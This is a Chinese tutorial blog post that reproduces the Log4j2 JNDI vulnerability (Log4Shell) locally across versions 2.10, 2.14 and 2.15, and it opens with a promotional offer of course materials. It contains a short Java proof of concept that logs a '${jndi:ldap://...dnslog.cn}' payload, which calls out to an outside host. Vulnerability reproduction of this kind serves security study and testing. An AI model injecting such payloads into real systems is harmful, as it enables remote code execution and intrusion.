最近整理了一些奇安信&华为&深信服大佬的课件资料+大厂面试课题，想要的可以私信回复“资料”自取，无偿赠送给粉丝朋友~

Apache Log4j是一个基于Java的日志记录组件。Apache Log4j2是Log4j的升级版本，通过重写Log4j引入了丰富的功能特性。该日志组件被广泛应用于业务系统开发，用以记录程序输入输出日志信息。

复现环境

java 版本：1.8.0_241

log4j 2.10版本漏洞复现

下载地址：
https://archive.apache.org/dist/logging/log4j/2.10.0

idea新建项目

项目路径

将log4j-api-2.10.0.jar，log4j-core-2.10.0.jar放入lib目录下,验证当前版本是否存在漏洞

在IDEA里将lib目录添加为库

新增java类

Log4jPOC.java

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;


public class Log4jPOC {
    private static final Logger logger = LogManager.getLogger(Log4jPOC.class);
    public static void main(String[] args) {
        logger.error("${jndi:ldap://i7dint.dnslog.cn}");
    }
}

其中i7dint.dnslog.cn修改为相应的地址

运行POC

回显

说明log4j-api-2.10，log4j-core-2.10版本存在漏洞

log4j 2.14版本漏洞复现

log4j-api-2.14 下载地址：
https://archive.apache.org/dist/logging/log4j/2.14.0/

将log4j-api-2.14 log4j-core-2.14放入lib目录

使用IDEA将lib目录添加到库

如下所示；

运行Log4jPOC

回显

log4j-api-2.15版本

将log4j-api-2.15 log4j-core-2.15放入lib目录

下载地址：
https://www.apache.org/dyn/closer.lua/logging/log4j/2.15.0/apache-log4j-2.15.0-bin.zip

使用IDEA将lib目录添加到库

如下所示；

运行Log4jPOC

log4j-api-2.15并未回显

poc来源：

https://github.com/tangxiaofeng7/apache-log4j-poc.git